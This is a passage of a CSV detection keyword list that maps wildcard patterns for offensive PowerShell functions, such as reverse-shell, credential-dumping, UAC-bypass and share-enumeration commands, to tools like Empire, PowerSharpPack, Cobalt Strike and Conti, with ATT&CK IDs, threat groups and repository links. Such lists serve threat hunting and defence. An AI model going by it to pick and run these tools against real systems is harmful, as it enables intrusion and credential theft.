TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ScheduledTasksImagePermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ScheduledTasksUnquotedPathCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-SCMPermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ScriptSentry*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Invoke-SCShell*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SDCLTBypass*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SDPropagator*,offensive_tool_keyword,powershell,propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.,T1222,TA0003,N/A,N/A,Persistence,https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1,1,1,N/A,N/A,1,57,10,2020-12-29T07:57:54Z,2020-10-14T05:01:51Z -*Invoke-Seatbelt*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Seatbelt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SendMail -Targets*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-SendReverseShell*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-SensitiveHiveFileAccessCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-SensitiveHiveShadowCopyCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ServiceAbuse*,offensive_tool_keyword,AD exploitation cheat sheet,Exploit vulnerable service permissions (does not require touching disk),T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-ServiceAbuse*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ServiceAbuse*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Service-persistence.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Invoke-ServicesImagePermissionsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ServicesImagePermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ServicesPermissionsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ServicesPermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ServicesPermissionsRegistryCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ServicesPermissionsRegistryCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ServicesUnquotedPathCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ServicesUnquotedPathCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-SessionGopher*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SessionGopher*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SessionGopher*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SessionGopher*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-ShadowSpray*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invoke-sharefinder *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*invokesharefinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-ShareFinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-ShareFinder*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-ShareFinder*,offensive_tool_keyword,Jira-Lens,finds (non-standard) shares on hosts in the local domain,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://powersploit.readthedocs.io/en/stable/Recon/README/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-ShareFinder*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-SharpAllowedToAct*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpBlock*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpBypassUAC*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpChromium*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpClipboard*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpCloud*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpCloud*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Sharpcradle*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpDPAPI*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharPersist*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpGPO*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpGPOAbuse*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpGPO-RemoteAccessPolicies*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpHandler*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpHide*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*InvokeSharpHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Invoke-Sharphound*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Sharphound2*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharphound3*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpHound4*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - 